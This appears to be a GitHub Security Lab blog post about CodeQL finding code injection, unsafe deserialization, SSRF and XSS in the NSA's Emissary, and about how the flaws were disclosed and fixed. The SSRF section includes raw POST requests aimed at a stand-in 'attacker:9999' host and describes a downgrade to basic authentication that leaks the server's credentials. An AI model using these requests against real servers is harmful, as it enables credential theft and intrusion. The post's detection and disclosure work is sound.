Some time ago, I read a blog post about the review that SonarSource security researchers performed of the Emissary application, which is maintained by the National Security Agency (NSA). According to the NSA, Emissary is a “P2P based data-driven workflow engine that runs in a heterogeneous possibly widely dispersed, multi-tiered P2P network of compute resources.” I read that as “this Java code probably handles a lot of attacker controlled input,” so naturally my interest was piqued.
The SonarSource blog post describes some of the vulnerabilities that researchers uncovered in Emissary, including:
- Code injection (CVE-2021-32096)
- Arbitrary file disclosure (CVE-2021-32093)
- Reflected cross-site scripting (CVE-2021-32092)
Having worked on a CodeQL query to detect similar code injection patterns, I wanted to check if the query could find these issues automatically. In this blog post, I describe how CodeQL detects some of the above-mentioned CVEs using its default rule set, how we were able to find an entirely new set of additional critical issues, and how the NSA leveraged GitHub code scanning and security advisories to ultimately address the issues.
CodeQL findings
Here’s a quick summary of my CodeQL findings, all of which I cover in detail below.
By running the standard set of CodeQL queries on the Emissary project, I found the previously reported arbitrary file disclosure (CVE-2021-32093) but also uncovered new issues:
- Unsafe deserialization (CVE-2021-32634)
- Server-side request forgery (CVE-2021-32639)
The original code injection CVE (CVE-2021-32096) was flagged by a community-contributed CodeQL query.
As of today, the reflected cross-site scripting vulnerability (CVE-2021-32092) is also found by a default CodeQL query.
Code injection (CVE-2021-32096)
Initially, when I tried the CodeQL script injection query on the Emissary 5.9.0 codebase, I got no results.
After reading the source code for the vulnerability details, I was sure that my query was correctly modeling the javax.script.ScriptEngine.eval() sink and that the source was already modeled by the default CodeQL JAX-RS libraries. However, I realized that the flow from the untrusted data to the script injection sink was not a “direct” one. You can take a look at how the code flows to understand why.
The JAX-RS endpoint where user data enters the application is:
The getOrCreateConsole(request) call invokes RubyConsole.getConsole(), which takes us to:
This code starts a new thread running the RubyConsole.run() method (since it implements the Java Runnable interface):
However, since stringToEval is null at this point, this method will almost immediately suspend the thread with the wait() method.
Later on, in the rubyConsolePost method, we find the following code:
Here is where the untrusted data (request.getParameter(CONSOLE_COMMAND_STRING)) enters the application and flows into the RubyConsole.evalAndWait() method. However, the evalAndWait() method is:
There are no actual calls to the RubyConsole.eval() method where the Ruby script is evaluated, so if you trace the tainted request parameter, you will end up in this method and reach the end of your taint trace. The user-controlled command just gets assigned to the stringToEval field, and that’s seemingly the end of the road. However, if you take a closer look, you will also see that this method calls notifyAll(), which wakes up the sleeping thread, which in turn runs the following expression:
result = this.eval(stringToEval);
To summarize:
- When the rubyConsolePost method is called, RubyConsole.run() is executed with a null stringToEval and then goes into a wait state.
- When evalAndWait(commandString) is called, stringToEval is assigned the user-controlled script and the waiting RubyConsole.run() method is resumed, which evaluates the now-assigned stringToEval.
Therefore, there is no direct (source to sink) data flow that a static code analysis tool can effectively follow. The good news is that by modeling the Java wait/notify pattern with a CodeQL taint step, I should be able to get this issue reported.
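To make the hand-off concrete, here is a minimal Java sketch of the same wait/notify shape. It is not the Emissary source: the class name ConsoleSketch is hypothetical, eval() is a harmless placeholder rather than a script engine, and the worker handles a single command. What it shows is that the tainted value only ever reaches eval() through a field that one thread writes and another thread reads.

```java
// Minimal stand-in for the RubyConsole hand-off described in the post.
// ConsoleSketch and its placeholder eval() are assumptions for illustration.
class ConsoleSketch implements Runnable {
    private String stringToEval; // written by the request thread, read by the worker
    private String result;       // written by the worker, read by the request thread

    // Placeholder sink: the real code evaluates a Ruby script at this point.
    private String eval(String script) {
        return "evaluated: " + script;
    }

    @Override
    public void run() {
        synchronized (this) {
            try {
                // Nothing to evaluate yet, so the worker parks itself.
                while (stringToEval == null) {
                    wait();
                }
            } catch (InterruptedException e) {
                Thread.currentThread().interrupt();
                return;
            }
            // Field read: the only place where the command reaches the sink.
            result = eval(stringToEval);
            stringToEval = null;
            notifyAll(); // wake the caller blocked in evalAndWait()
        }
    }

    public String evalAndWait(String command) {
        synchronized (this) {
            stringToEval = command; // field write: no call to eval() in this method
            notifyAll();            // wake the worker parked in run()
            try {
                while (result == null) {
                    wait();
                }
            } catch (InterruptedException e) {
                Thread.currentThread().interrupt();
                throw new IllegalStateException("interrupted while waiting for result", e);
            }
            return result;
        }
    }
}
```

Starting a thread on a ConsoleSketch instance and then calling evalAndWait("puts 1") from another thread returns the placeholder result, even though no call edge links evalAndWait() to eval().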
In this code pattern, you can see two different types of blocks: synchronized blocks that call notify and synchronized blocks that call wait. When the synchronization occurs on the same object, I want to connect writes in the notify block with reads of the same fields in the wait block. That means I need an additional taint step to connect these otherwise disconnected nodes so that CodeQL’s taint tracking can bridge this logical disconnect:
class NotifyWaitTaintStep extends TaintTracking::AdditionalTaintStep {
  override predicate step(DataFlow::Node n1, DataFlow::Node n2) {
    exists(MethodAccess notify, MethodAccess wait, SynchronizedStmt notifySync, SynchronizedStmt waitSync |
      // a notify()/notifyAll() call inside one synchronized block
      notify.getMethod().hasQualifiedName("java.lang", "Object", ["notify", "notifyAll"]) and
      notify.getAnEnclosingStmt() = notifySync and
      // a wait() call inside another synchronized block
      wait.getMethod().hasQualifiedName("java.lang", "Object", "wait") and
      wait.getAnEnclosingStmt() = waitSync and
      // both blocks lock on expressions of the same type
      waitSync.getExpr().getType() = notifySync.getExpr().getType() and
      // connect a field write in the notify block to a read of that field in the wait block
      exists(AssignExpr write, FieldAccess read |
        write.getAnEnclosingStmt() = notifySync and
        write = n1.asExpr() and
        read.getAnEnclosingStmt() = waitSync and
        read.getField() = write.getDest().(FieldAccess).getField() and
        read = n2.asExpr()
      )
    )
  }
}
With this additional taint step enabled, I was able to get this issue successfully reported:
What’s awesome is that this query wasn’t developed by GitHub CodeQL engineers but contributed and improved by several CodeQL community members. A big shoutout to @SpaceWhite, @p0wn4j, and @lucha-bc:
- https://github.com/github/codeql/pull/2850
- https://github.com/github/codeql/pull/5349
- https://github.com/github/codeql/pull/5802
This community-contributed query is on its way to the standard query set and will soon be available to all open source projects running GitHub code scanning.
I also contributed my notify/wait pattern taint step to the CodeQL repository, which may soon enable similar dataflow analysis between synchronized fields for all CodeQL users!
Arbitrary file disclosure (CVE-2021-32093)
CodeQL found the arbitrary file disclosure with its default configuration. I won’t go into the details of this vulnerability, since the SonarSource blog post already describes it.
Unsafe deserialization (CVE-2021-32634)
CodeQL default queries also reported three unsafe deserialization operations.
The first one was located in the WorkSpaceClientEnqueueAction REST endpoint:
@POST
@Path("/WorkSpaceClientEnqueue.action")
@Consumes(MediaType.APPLICATION_FORM_URLENCODED)
@Produces(MediaType.TEXT_PLAIN)
public Response workspaceClientEnqueue(@FormParam(WorkSpaceAdapter.CLIENT_NAME) String clientName,
        @FormParam(WorkSpaceAdapter.WORK_BUNDLE_OBJ) String workBundleString) {
    logger.debug("TPWorker incoming execute! check prio={}", Thread.currentThread().getPriority());
    // TODO Doesn't look like anything is actually calling this, should we remove this?
    final boolean success;
    try {
        // Look up the place reference
        final String nsName = KeyManipulator.getServiceLocation(clientName);
        final IPickUpSpace place = (IPickUpSpace) Namespace.lookup(nsName);
        if (place == null) {
            throw new IllegalArgumentException("No client place found using name " + clientName);
        }
        final ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(workBundleString.getBytes("8859_1")));
        WorkBundle paths = (WorkBundle) ois.readObject();
        success = place.enque(paths);
    }
    ...
}
This endpoint can be reached via an authenticated POST request to /WorkSpaceClientEnqueue.action. As you can read in the source code, the form parameter WorkSpaceAdapter.WORK_BUNDLE_OBJ (tpObj) gets decoded and deserialized in line 52:
final ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(workBundleString.getBytes("8859_1")));
Fortunately, this is a post-authentication issue, and since the SonarSource report got the cross-site request forgery (CSRF) vulnerability fixed, this vulnerability could not be exploited on behalf of a logged-in user through CSRF.
CodeQL also reported two other unsafe deserialization operations which are not currently exercised in the code. However, they are ticking bombs which could be enabled in future releases and therefore the Security Lab team also reported them.
The first one originates from the MoveToAction class, which was not exposed by the Jersey server. As described in a comment: “// TODO This is an initial crack at the new endpoint, I haven’t seen it called an am unsure when/if it does”
MoveToAction:
public Response moveTo(@Context HttpServletRequest request)
final MoveToAdapter mt = new MoveToAdapter();
final boolean status = mt.inboundMoveTo(request);
...
MoveToAdapter:
public boolean inboundMoveTo(final HttpServletRequest req)
final MoveToRequestBean bean = new MoveToRequestBean(req);
MoveToRequestBean(final HttpServletRequest req)
final String agentData = RequestUtil.getParameter(req, AGENT_SERIAL);
setPayload(agentData);
this.payload = PayloadUtil.deserialize(s);
...
PayloadUtil:
ois = new ObjectInputStream(new ByteArrayInputStream(s.getBytes("8859_1")));
The second one originates from the inboundEnque method of the WorkSpaceAdapter class. The vulnerability requires a call to inboundEnque(), which is currently not exercised.
WorkSpaceAdapter:
/**
 * Process the enque coming remotely over HTTP request params onto the specified (local) pickup client place
 */
public boolean inboundEnque(final HttpServletRequest req) throws NamespaceException {
    logger.debug("TPA incoming elements! check prio={}", Thread.currentThread().getPriority());
    // Parse parameters
    final EnqueRequestBean bean = new EnqueRequestBean(req);
    // Look up the place reference
    final String nsName = KeyManipulator.getServiceLocation(bean.getPlace());
    final IPickUpSpace place = lookupPlace(nsName);
    if (place == null) {
        throw new IllegalArgumentException("No client place found using name " + bean.getPlace());
    }
    return place.enque(bean.getPaths());
}
WorkSpaceAdapter:
EnqueRequestBean(final HttpServletRequest req) {
    setPlace(RequestUtil.getParameter(req, CLIENT_NAME));
    if (getPlace() == null) {
        throw new IllegalArgumentException("No 'place' specified");
    }
    setPaths(RequestUtil.getParameter(req, WORK_BUNDLE_OBJ));
}
WorkSpaceAdapter:
/**
 * Sets the WorkBundle object from serialized data
 */
void setPaths(final String s) {
    try {
        final ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(s.getBytes("8859_1")));
        this.paths = (WorkBundle) ois.readObject();
    } catch (Exception e) {
        logger.error("Cannot deserialize WorkBundle using {} bytes", s.length(), e);
        throw new IllegalArgumentException("Cannot deserialize WorkBundle");
    }
}
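All three code paths above turn a request parameter into bytes with the ISO-8859-1 ("8859_1") charset and pass them straight to ObjectInputStream.readObject(). One common way to harden that pattern is an allow-list deserialization filter. The sketch below is a generic illustration and not the fix Emissary shipped, which this post does not show. It assumes Java 9 or later for java.io.ObjectInputFilter, and WorkItem and FilteredDeserializer are hypothetical names, with WorkItem standing in for WorkBundle.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.nio.charset.StandardCharsets;

// Hypothetical stand-in for the WorkBundle payload type.
class WorkItem implements Serializable {
    private static final long serialVersionUID = 1L;
    final String path;

    WorkItem(String path) {
        this.path = path;
    }
}

class FilteredDeserializer {
    // Same transport as the endpoints above: each char of the string is one byte.
    static String serialize(Serializable value) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(value);
        }
        return new String(bos.toByteArray(), StandardCharsets.ISO_8859_1);
    }

    static Object deserialize(String encoded) throws IOException, ClassNotFoundException {
        // Allow the expected payload type and java.lang classes, reject everything else.
        ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(
                WorkItem.class.getName() + ";java.lang.*;!*");
        byte[] raw = encoded.getBytes(StandardCharsets.ISO_8859_1);
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(raw))) {
            ois.setObjectInputFilter(filter); // must be set before readObject()
            return ois.readObject();
        }
    }
}
```

With this filter in place, a serialized WorkItem round-trips normally, while a stream containing any class outside the allow-list (for example a java.util.HashMap) fails with an InvalidClassException before that class is instantiated.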
Server-side request forgery (CVE-2021-32639)
This finding is another great example of a community contribution. The query that reported this issue was originally contributed by @lucha-bc and @porcupineyhairs, and has already been promoted into the default set of rules used in any CodeQL scan.
The query reports two server-side request forgery (SSRF) issues. The first one affects the RegisterPeerAction REST endpoint. For example, the following request will cause multiple requests to be sent to an attacker-controlled server at http://attacker:9999.
POST /emissary/RegisterPeer.action? HTTP/1.1
Host: localhost:8001
Content-Type: application/x-www-form-urlencoded
directoryName=foo.bar.baz.http://attacker:9999/&targetDir=http://localhost:8001/DirectoryPlace
An important thing to note is that some of the forged requests were unauthenticated requests sent to the /emissary/Heartbeat.action endpoint:
POST /emissary/Heartbeat.action HTTP/1.1
Content-Length: 180
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Host: attacker:9999
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.5.1 (Java/1.8.0_242)
Accept-Encoding: gzip,deflate
hbf=EMISSARY_DIRECTORY_SERVICES.DIRECTORY.STUDY.http%3A%2F%2Flocalhost%3A8001%2FDirectoryPlace&hbt=http%3A%2F%2Fattacker:9999%2FDirectoryPlace
However, there were also authenticated requests sent to the /emissary/RegisterPeer.action endpoint on the attacker-controlled server:
POST /emissary/RegisterPeer.action HTTP/1.1
Content-Length: 196
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Host: attacker:9999
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.5.1 (Java/1.8.0_242)
Accept-Encoding: gzip,deflate
targetDir=http%3A%2F%2Fattacker:9999%2FDirectoryPlace&directoryName=EMISSARY_DIRECTORY_SERVICES.DIRECTORY.STUDY.http%3A%2F%2Flocalhost%3A8001%2FDirectoryPlace
SSRF issues are normally used to reach internal servers or to scan the internal network, but in this case I thought of a different exploitation scenario. Since one of the SSRF issues resulted in the Apache HTTP client used by Emissary sending an authenticated request with a digest authentication header, I theorized I could potentially coax the client to switch to basic authentication and as a result leak the server credentials.
To send authenticated requests using the Apache HTTP client, one needs to set the credentials on a credentials provider and then configure the HTTP client to use that credentials provider:
You can see that the credentials are read from the Jetty user realm and used to connect to any host and any port that requires credentials. Those credentials are set in a credential provider (CRED_PROV) which is later configured as the default credentials provider for the main Emissary client (CLIENT).
The configuration does not specify what authentication scheme should be used, which led me to believe that the authentication scheme is decided based on the server response. If I politely ask the client to use basic authentication, then all signs point to the possibility that the server credentials will then be sent in the clear (base64 encoded).
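The reason a downgrade to basic authentication matters is that the Authorization header then carries the user name and password with nothing more than base64 encoding, which anyone who receives the request can reverse. A small sketch using only the Java standard library shows this; the class name BasicAuthHeader is hypothetical, and the sample credentials are the well-known example pair from the HTTP Basic authentication specification, not Emissary credentials.

```java
import java.nio.charset.StandardCharsets;
import java.util.Base64;

// Illustration only: how a Basic Authorization header value is built and reversed.
class BasicAuthHeader {
    // Builds the value a client sends: "Basic " + base64(user ":" password).
    static String encode(String user, String password) {
        String pair = user + ":" + password;
        return "Basic " + Base64.getEncoder().encodeToString(pair.getBytes(StandardCharsets.UTF_8));
    }

    // Recovers {user, password} from the header value, as a receiving server can.
    static String[] decode(String headerValue) {
        String encoded = headerValue.substring("Basic ".length());
        String pair = new String(Base64.getDecoder().decode(encoded), StandardCharsets.UTF_8);
        return pair.split(":", 2); // the password itself may contain ':'
    }
}
```

For example, encode("Aladdin", "open sesame") yields "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", and decode() on that value returns the original pair. Digest authentication, by contrast, sends a hash computed over a server-supplied nonce rather than the password itself.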
I set up a web server requesting basic authentication and then used the SSRF issue to make the Emissary server connect to my malicious server. The Emissary HTTP client happily switched from digest authentication to basic authentication and sent the credentials to me. This was the output of my server showing the server credentials:
Similarly, the AddChildDirectoryAction endpoint was also vulnerable to SSRF. A POST request to the /AddChildDirectory.action endpoint will trigger additional requests to hosts controlled by the attacker:
POST /emissary/AddChildDirectory.action HTTP/1.1
Host: localhost:8001
x-requested-by:
Content-Type: application/x-www-form-urlencoded
directoryName=foo.bar.baz.http://attacker:9999/&targetDir=http://localhost:8001/DirectoryPlace
In addition to fixing the SSRF issues, the NSA also prevented the authentication method confusion by only allowing the digest authentication scheme.
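This post does not show the SSRF patch itself, so the following is not Emissary's fix. It is a generic sketch of one widely used mitigation: checking a user-supplied URL against an allow-list of known peers before the server connects to it. The class name OutboundTargetValidator and the idea of a fixed host:port allow-list are assumptions made for illustration.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Locale;
import java.util.Set;

// Hypothetical helper: only URLs whose host and port are on the allow-list pass.
class OutboundTargetValidator {
    private final Set<String> allowedHostPorts; // entries such as "localhost:8001"

    OutboundTargetValidator(Set<String> allowedHostPorts) {
        this.allowedHostPorts = allowedHostPorts;
    }

    boolean isAllowed(String url) {
        final URI uri;
        try {
            uri = new URI(url);
        } catch (URISyntaxException e) {
            return false; // unparseable input is never trusted
        }
        String scheme = uri.getScheme();
        String host = uri.getHost();
        if (scheme == null || host == null) {
            return false;
        }
        if (!scheme.equalsIgnoreCase("http") && !scheme.equalsIgnoreCase("https")) {
            return false;
        }
        // getPort() returns -1 when no port is given, which will not match any entry
        // of the form "host:port", so callers must spell out the port explicitly.
        String hostPort = host.toLowerCase(Locale.ROOT) + ":" + uri.getPort();
        return allowedHostPorts.contains(hostPort);
    }
}
```

With an allow-list containing only "localhost:8001", the targetDir value http://localhost:8001/DirectoryPlace from the requests above is accepted, while http://attacker:9999/ is rejected before any outbound connection is made.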
Reflected cross-site scripting (CVE-2021-32092)
CodeQL did a great job automatically finding most of the issues reported by the SonarSource researchers as well as several new critical issues. However, it did not report the cross-site scripting (XSS) issue originally reported by SonarSource researchers. I checked our query set and found that there were no queries for this particular instance of XSS.
I then set out to collaborate with the CodeQL team to include a rather comprehensive analysis of XSS issues on JAX-RS endpoints. This XSS detection is now included in the main CodeQL repository as well!
Accurately detecting XSS on REST endpoints is not a simple task since most of them will default to the application/json response content-type, which is safe from XSS. Therefore, I needed CodeQL to detect not only that user-controlled data (either reflected or persisted) is used in the HTTP response without proper encoding, but also that the content-type of such a response was changed to any of the XSS-friendly types. This can be accomplished in a number of ways:
- By explicitly setting the response content-type with ResponseBuilder.type()
- By annotating the enclosing method with the @Produces annotation
- By annotating the enclosing class with the @Produces annotation
If you’re interested in the CodeQL implementation details, you can check the promotion pull request.
While working on these query improvements with the CodeQL team, I realized that our XSS query for Spring REST endpoints was not accounting for the response content-type either, which could result in a number of false positives (for example, responses with the application/json content-type being flagged as exploitable). So we also implemented the required improvements to bring the Spring XSS query to the same level of accuracy that JAX-RS now has.
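The content-type condition can be pictured with a small Java sketch. This is not how the CodeQL query is implemented, and the set of "XSS-friendly" media types below is an illustrative assumption rather than the list CodeQL uses. The class name XssContentTypeCheck is hypothetical. It pairs the content-type check with the kind of HTML encoding whose absence the query looks for.

```java
import java.util.Locale;
import java.util.Set;

// Illustration only: decide whether a declared content-type is rendered as markup,
// and encode user data for responses where it is.
class XssContentTypeCheck {
    // Assumed, non-exhaustive set of media types a browser renders as markup.
    private static final Set<String> XSS_FRIENDLY =
            Set.of("text/html", "application/xhtml+xml", "image/svg+xml");

    static boolean isXssFriendly(String contentType) {
        // Drop parameters such as "; charset=UTF-8" and normalize case.
        String mediaType = contentType.split(";", 2)[0].trim().toLowerCase(Locale.ROOT);
        return XSS_FRIENDLY.contains(mediaType);
    }

    // Minimal HTML encoding for text placed in element content or quoted attributes.
    static String escapeHtml(String input) {
        StringBuilder out = new StringBuilder(input.length());
        for (char c : input.toCharArray()) {
            switch (c) {
                case '&': out.append("&amp;"); break;
                case '<': out.append("&lt;"); break;
                case '>': out.append("&gt;"); break;
                case '"': out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                default: out.append(c);
            }
        }
        return out.toString();
    }
}
```

Under these assumptions, a response declared as "text/html; charset=UTF-8" that echoes a request parameter without escapeHtml() would be worth flagging, whereas the same echo in an application/json response would not.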
GitHub Security Advisories and code scanning
For an open source maintainer (yep, even the NSA), the process of receiving vulnerability reports and then collaborating with vulnerability reporters to triage an issue, getting a CVE assigned, and publishing and hosting a vulnerability advisory to notify downstream users can be a daunting task. To make this process more manageable for open source maintainers, GitHub created the GitHub Security Advisory (GHSA). An open source maintainer can create a private draft security advisory and use this draft advisory to communicate with vulnerability reporters in private. It also enables the creation of a private fork where maintainers and researchers can privately collaborate on vulnerability triage. Once a patch is available, requesting a CVE and publishing the advisory is just a matter of a few clicks.
After I reported the newly uncovered issues to the Emissary maintainers, they created their first GHSA!
“We ended up using the GitHub mechanisms to create a fork/branch [in order to] capture and review the changes[. We] ultimately merged the fix from there and sent the request to obtain a CVE. All very straightforward.”
A member of the Emissary Development Team
Furthermore, after verifying the accuracy of the CodeQL queries, the Emissary development team also enabled code scanning to run automatic CodeQL scans on new pull requests. Code scanning is free to use for open source projects and provides all the power of CodeQL standard query sets to your projects.
Conclusions
The GitHub Security Lab’s mission is to help secure open source software by reporting vulnerabilities and empowering others to find and fix variants of those vulnerabilities. To help achieve this mission, we want to share the tooling and methodologies that we use with the security research and developer communities and make our processes easy to adopt and use. CodeQL is a powerful static application security testing (SAST) engine, but what makes it even more powerful is that it’s fueled by community contributions. By turning your vulnerability findings into CodeQL queries, you amplify your research at GitHub scale through the CodeQL code scanning ecosystem. Head to the Security Lab bug bounty program to propose your contributions!
GitHub Security Advisories are also helping OSS maintainers more effectively navigate the vulnerability reporting process and reduce the resources diverted away from feature development. Learn how to use GitHub Security Advisories to privately discuss, fix, and publish information about security vulnerabilities in your project. Stay secure!